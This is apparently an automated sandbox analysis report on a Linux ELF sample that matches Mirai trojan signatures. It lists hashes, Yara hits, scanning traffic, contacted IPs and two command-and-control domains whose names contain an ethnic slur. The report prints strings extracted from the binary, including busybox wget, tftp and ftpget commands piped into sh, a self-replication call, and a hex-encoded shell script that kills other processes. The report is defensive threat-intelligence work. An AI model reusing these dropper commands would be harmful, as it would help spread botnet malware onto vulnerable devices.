Linux Analysis Report
nklx86.elf

Overview

General Information

Sample name:	nklx86.elf
Analysis ID:	1543152
MD5:	ad3dffdb2f60c62fa8965782227f7004
SHA1:	a75d685d390f8f4f6b4ccfe82aae1facd62e196d
SHA256:	c559d179619c9811a2150435973aaaf4a39583dc0af69d7d33269a596fcd857b
Tags:	elfuser-abuse_ch
Infos:

Detection

Score:	64
Range:	0 - 100
Whitelisted:	false

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Connects to many ports of the same IP (likely port scanning)

Machine Learning detection for sample

Detected TCP or UDP traffic on non-standard ports

Found strings indicative of a multi-platform dropper

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample has stripped symbol table

Yara signature match

Classification

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: nklx86.elf

ReversingLabs: Detection: 52%

Machine Learning detection for sample

Source: nklx86.elf

Joe Sandbox ML: detected

Found strings indicative of a multi-platform dropper

Source: nklx86.elf	String: /bin/busyboxincorrectinvalidbadwrongfaildeniederrorretryenablelinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> >sh .k/bin/busybox wget http:///curl.sh -o- \| shGET /dlr. HTTP/1.0
Source: nklx86.elf	String: .dThe People's/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/armarm5arm6arm7mipsmpslppcspcsh4/wget.sh -O- \| sh;/bin/busybox tftp -g -r tftp.sh -l- \| sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"

Networking

Connects to many ports of the same IP (likely port scanning)

Source: global traffic	TCP traffic: 45.156.86.24 ports 38241,1,2,3,4,8
Source: global traffic	TCP traffic: 185.150.24.67 ports 38241,1,2,3,4,8

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.14:51304 -> 185.150.24.67:38241
Source: global traffic	TCP traffic: 192.168.2.14:58788 -> 45.156.86.24:38241

Source: unknown	TCP traffic detected without corresponding DNS query: 140.50.195.125
Source: unknown	TCP traffic detected without corresponding DNS query: 177.233.137.127
Source: unknown	TCP traffic detected without corresponding DNS query: 137.198.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 167.76.226.26
Source: unknown	TCP traffic detected without corresponding DNS query: 187.84.208.61
Source: unknown	TCP traffic detected without corresponding DNS query: 183.162.101.195
Source: unknown	TCP traffic detected without corresponding DNS query: 138.199.211.255
Source: unknown	TCP traffic detected without corresponding DNS query: 167.84.253.140
Source: unknown	TCP traffic detected without corresponding DNS query: 114.72.197.191
Source: unknown	TCP traffic detected without corresponding DNS query: 36.82.130.234
Source: unknown	TCP traffic detected without corresponding DNS query: 39.64.28.45
Source: unknown	TCP traffic detected without corresponding DNS query: 179.105.167.227
Source: unknown	TCP traffic detected without corresponding DNS query: 100.36.37.32
Source: unknown	TCP traffic detected without corresponding DNS query: 28.47.137.211
Source: unknown	TCP traffic detected without corresponding DNS query: 167.176.53.217
Source: unknown	TCP traffic detected without corresponding DNS query: 69.72.168.215
Source: unknown	TCP traffic detected without corresponding DNS query: 198.225.119.135
Source: unknown	TCP traffic detected without corresponding DNS query: 121.65.230.143
Source: unknown	TCP traffic detected without corresponding DNS query: 209.157.111.212
Source: unknown	TCP traffic detected without corresponding DNS query: 15.247.255.202
Source: unknown	TCP traffic detected without corresponding DNS query: 223.240.23.97
Source: unknown	TCP traffic detected without corresponding DNS query: 55.205.72.40
Source: unknown	TCP traffic detected without corresponding DNS query: 194.107.216.250
Source: unknown	TCP traffic detected without corresponding DNS query: 79.26.50.29
Source: unknown	TCP traffic detected without corresponding DNS query: 115.226.107.160
Source: unknown	TCP traffic detected without corresponding DNS query: 79.139.80.207
Source: unknown	TCP traffic detected without corresponding DNS query: 17.61.111.250
Source: unknown	TCP traffic detected without corresponding DNS query: 100.188.142.234
Source: unknown	TCP traffic detected without corresponding DNS query: 161.228.14.242
Source: unknown	TCP traffic detected without corresponding DNS query: 157.8.49.157
Source: unknown	TCP traffic detected without corresponding DNS query: 49.60.237.11
Source: unknown	TCP traffic detected without corresponding DNS query: 48.55.57.153
Source: unknown	TCP traffic detected without corresponding DNS query: 5.105.206.243
Source: unknown	TCP traffic detected without corresponding DNS query: 131.121.242.234
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.117.158
Source: unknown	TCP traffic detected without corresponding DNS query: 75.56.164.22
Source: unknown	TCP traffic detected without corresponding DNS query: 194.82.103.183
Source: unknown	TCP traffic detected without corresponding DNS query: 121.239.220.23
Source: unknown	TCP traffic detected without corresponding DNS query: 78.76.177.104
Source: unknown	TCP traffic detected without corresponding DNS query: 41.15.138.211
Source: unknown	TCP traffic detected without corresponding DNS query: 15.150.191.57
Source: unknown	TCP traffic detected without corresponding DNS query: 223.171.8.24
Source: unknown	TCP traffic detected without corresponding DNS query: 183.201.20.71
Source: unknown	TCP traffic detected without corresponding DNS query: 31.112.17.49
Source: unknown	TCP traffic detected without corresponding DNS query: 52.169.138.8
Source: unknown	TCP traffic detected without corresponding DNS query: 171.45.56.202
Source: unknown	TCP traffic detected without corresponding DNS query: 134.182.182.185
Source: unknown	TCP traffic detected without corresponding DNS query: 44.237.52.141
Source: unknown	TCP traffic detected without corresponding DNS query: 69.19.145.232
Source: unknown	TCP traffic detected without corresponding DNS query: 159.175.74.254

Source: global traffic	DNS traffic detected: DNS query: chinklabs.dyn
Source: global traffic	DNS traffic detected: DNS query: yellowchink.pirate

Source: nklx86.elf

String found in binary or memory: http:///curl.sh

System Summary

Malicious sample detected (through community Yara rule)

Source: nklx86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: nklx86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: nklx86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: nklx86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 5801.1.0000000008048000.0000000008055000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 5801.1.0000000008048000.0000000008055000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 5801.1.0000000008048000.0000000008055000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 5801.1.0000000008048000.0000000008055000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: usage: busybox
Source: Initial sample	String containing 'busybox' found: /bin/busybox hostname PBOC
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo >
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sample	String containing 'busybox' found: /bin/busybox wget http://
Source: Initial sample	String containing 'busybox' found: /wget.sh -O- \| sh;/bin/busybox tftp -g
Source: Initial sample	String containing 'busybox' found: -r tftp.sh -l- \| sh;/bin/busybox ftpget
Source: Initial sample	String containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
Source: Initial sample	String containing 'busybox' found: /bin/busyboxincorrectinvalidbadwrongfaildeniederrorretryenablelinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> >sh .k/bin/busybox wget http:///curl.sh -o- \| shGET /dlr. HTTP/1.0
Source: Initial sample	String containing 'busybox' found: .dThe People's/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/armarm5arm6arm7mipsmpslppcspcsh4/wget.sh -O- \| sh;/bin/busybox tftp -g -r tftp.sh -l- \| sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x

Sample has stripped symbol table

Source: ELF static info symbol of initial sample

.symtab present: no

Yara signature match

Source: nklx86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: nklx86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: nklx86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: nklx86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 5801.1.0000000008048000.0000000008055000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 5801.1.0000000008048000.0000000008055000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 5801.1.0000000008048000.0000000008055000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 5801.1.0000000008048000.0000000008055000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26

Source: classification engine

Classification label: mal64.troj.linELF@0/0@2/0

Screenshots

No Screenshots

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.89.128.145	unknown	France	44902	COV-ASNFR	false
125.35.6.54	unknown	China	4808	CHINA169-BJChinaUnicomBeijingProvinceNetworkCN	false
91.111.159.238	unknown	United Kingdom	12576	EELtdGB	false
209.244.88.127	unknown	United States	3356	LEVEL3US	false
110.61.10.34	unknown	China	9394	CTTNETChinaTieTongTelecommunicationsCorporationCN	false
105.154.41.155	unknown	Morocco	36903	MT-MPLSMA	false
155.35.98.217	unknown	United States	24324	KORDIA-TRANSIT-AS-APKordiaLimitedNZ	false
172.188.201.85	unknown	United States	7018	ATT-INTERNET4US	false
23.99.21.133	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
29.125.23.107	unknown	United States	7922	COMCAST-7922US	false
45.179.70.173	unknown	Brazil	269109	MARKTECTELECOMBR	false
213.149.254.169	unknown	Spain	16371	ACENS_ASSpainHostinghousingandVPNservicesES	false
83.165.182.124	unknown	Spain	12334	Galicia-SpainES	false
1.206.192.102	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
117.62.255.98	unknown	China	134756	CHINANET-NANJING-IDCCHINANETNanjingIDCnetworkCN	false
168.181.68.255	unknown	Brazil	265357	KDINTERNETBR	false
217.95.15.240	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
153.160.180.25	unknown	Japan	4713	OCNNTTCommunicationsCorporationJP	false
125.102.72.243	unknown	Japan	17506	UCOMARTERIANetworksCorporationJP	false
142.22.229.222	unknown	Canada	3633	PROVINCE-OF-BRITISH-COLUMBIACA	false
144.71.232.116	unknown	United States	2768	ERIE-COUNTYUS	false
213.149.254.180	unknown	Spain	16371	ACENS_ASSpainHostinghousingandVPNservicesES	false
59.19.72.101	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false
129.21.138.40	unknown	United States	4385	RIT-ASNUS	false
110.116.63.195	unknown	China	9394	CTTNETChinaTieTongTelecommunicationsCorporationCN	false
88.16.66.54	unknown	Spain	3352	TELEFONICA_DE_ESPANAES	false
97.219.229.28	unknown	United States	6167	CELLCO-PARTUS	false
112.105.112.80	unknown	Taiwan; Republic of China (ROC)	4780	SEEDNETDigitalUnitedIncTW	false
130.79.175.73	unknown	France	2259	FR-U-STRASBOURGOSIRIS-UNIVERSITEDESTRASBOURGEU	false
68.234.48.9	unknown	United States	3580	PLANETUS	false
168.92.174.190	unknown	United States	2707	FIRSTCOMM-AS1US	false
67.217.246.27	unknown	United States	7381	SRS-6-Z-7381US	false
23.96.107.131	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
62.182.139.28	unknown	Russian Federation	29497	KUBANGSMRU	false
162.164.130.158	unknown	United States	21928	T-MOBILE-AS21928US	false
150.226.210.6	unknown	United States	1474	DNIC-ASBLK-01474-01477US	false
8.100.35.1	unknown	United States	3356	LEVEL3US	false
134.218.246.40	unknown	United States	22586	AS22586US	false
6.28.23.245	unknown	United States	3356	LEVEL3US	false
66.42.54.66	unknown	United States	20473	AS-CHOOPAUS	false
136.33.145.240	unknown	United States	16591	GOOGLE-FIBERUS	false
156.109.220.121	unknown	United States	36081	STATE-OF-COLORADO-MNT-NETWORKUS	false
128.78.247.5	unknown	France	5410	BOUYGTEL-ISPFR	false
6.10.35.194	unknown	United States	668	DNIC-AS-00668US	false
202.80.50.223	unknown	India	703	UUNETUS	false
39.52.249.214	unknown	Pakistan	45595	PKTELECOM-AS-PKPakistanTelecomCompanyLimitedPK	false
140.53.49.87	unknown	United States	668	DNIC-AS-00668US	false
30.132.108.155	unknown	United States	7922	COMCAST-7922US	false
37.23.51.109	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
116.4.101.251	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
101.187.217.122	unknown	Australia	1221	ASN-TELSTRATelstraCorporationLtdAU	false
212.233.102.134	unknown	Russian Federation	9110	AGTELECOM-ASRU	false
215.63.43.209	unknown	United States	721	DNIC-ASBLK-00721-00726US	false
23.52.18.184	unknown	United States	16625	AKAMAI-ASUS	false
217.68.54.185	unknown	Netherlands	29263	HAAGNET-AS	false
11.195.83.47	unknown	United States	3356	LEVEL3US	false
130.88.145.107	unknown	United Kingdom	786	JANETJiscServicesLimitedGB	false
107.53.130.132	unknown	United States	16567	NETRIX-16567US	false
160.134.19.218	unknown	United States	1466	DNIC-AS-01466US	false
80.17.122.94	unknown	Italy	3269	ASN-IBSNAZIT	false
154.114.95.172	unknown	South Africa	2018	TENET-1ZA	false
3.11.253.187	unknown	United States	16509	AMAZON-02US	false
202.139.160.73	unknown	Australia	7474	OPTUSCOM-AS01-AUSingTelOptusPtyLtdAU	false
29.233.109.149	unknown	United States	7922	COMCAST-7922US	false
26.177.209.164	unknown	United States	7922	COMCAST-7922US	false
114.98.88.143	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
33.64.180.168	unknown	United States	2686	ATGS-MMD-ASUS	false
52.240.245.137	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
169.210.143.37	unknown	Korea Republic of	37611	AfrihostZA	false
41.94.187.84	unknown	Mozambique	327700	MoRENetMZ	false
195.36.36.114	unknown	Italy	5392	TELNET-ITALYTELNETSrlIT	false
181.48.167.159	unknown	Colombia	14080	TelmexColombiaSACO	false
195.213.49.51	unknown	Belgium	6871	PLUSNETUKInternetServiceProviderGB	false
101.114.117.122	unknown	Australia	133612	VODAFONE-AS-APVodafoneAustraliaPtyLtdAU	false
45.143.235.209	unknown	Estonia	39855	MOD-EUNL	false
7.144.154.2	unknown	United States	3356	LEVEL3US	false
75.246.129.44	unknown	United States	22394	CELLCOUS	false
33.179.97.0	unknown	United States	2686	ATGS-MMD-ASUS	false
43.127.94.166	unknown	Japan	4249	LILLY-ASUS	false
58.109.94.63	unknown	Australia	4804	MPX-ASMicroplexPTYLTDAU	false
132.82.2.124	unknown	United States	306	DNIC-ASBLK-00306-00371US	false
30.78.46.33	unknown	United States	7922	COMCAST-7922US	false
210.123.22.140	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false
186.69.0.224	unknown	Ecuador	14522	SatnetEC	false
89.127.118.199	unknown	Ireland	25441	IBIS-ASImagineGroupLtdIE	false
106.251.165.206	unknown	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	false
51.107.159.118	unknown	United Kingdom	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
220.75.160.240	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false
100.144.52.190	unknown	United States	21928	T-MOBILE-AS21928US	false
196.217.185.205	unknown	Morocco	36903	MT-MPLSMA	false
123.102.119.243	unknown	Australia	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
168.133.42.52	unknown	United States	18191	AIRSERVICESAUS-APOPTUSCUSTOMERNETWORKAU	false
203.157.65.35	unknown	Thailand	9649	MOPH-TH-APInformationTechnologyOfficeSG	false
126.142.1.183	unknown	Japan	17676	GIGAINFRASoftbankBBCorpJP	false
110.197.249.153	unknown	China	63711	CTTNETChinaTieTongTelecommunicationsCorporationCN	false
218.8.15.150	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
170.98.38.39	unknown	United States	18980	PEACEHEALTHUS	false
123.251.135.158	unknown	Korea Republic of	9845	CJCKN-AS-KRLGHelloVisionCorpKR	false
24.81.19.128	unknown	Canada	6327	SHAWCA	false
134.210.109.50	unknown	United States	21976	NJEDGE-NETUS	false

Contacted Domains

Name	IP	Active
yellowchink.pirate	45.156.86.24	true
chinklabs.dyn	185.150.24.67	true

ID:	1543152
Product:	CloudBasic
Start time:	09:55:58
Start date:	27.10.2024
Sample:	nklx86.elf
Cookbook:	defaultlinuxfilecookbook.jbs
System description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Architecture:	LINUX
MD5:	ad3dffdb2f60c62fa8965782227f7004
SHA1:	a75d685d390f8f4f6b4ccfe82aae1facd62e196d
SHA256:	c559d179619c9811a2150435973aaaf4a39583dc0af69d7d33269a596fcd857b
Filetype:	ELF Executable and Linkable format (Linux) (4029/14) 50.16%

Linux Analysis Report nklx86.elf

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Spreading

Networking

System Summary

Screenshots

Network Map

Contacted Public IPs

Contacted Domains

Linux Analysis Report
nklx86.elf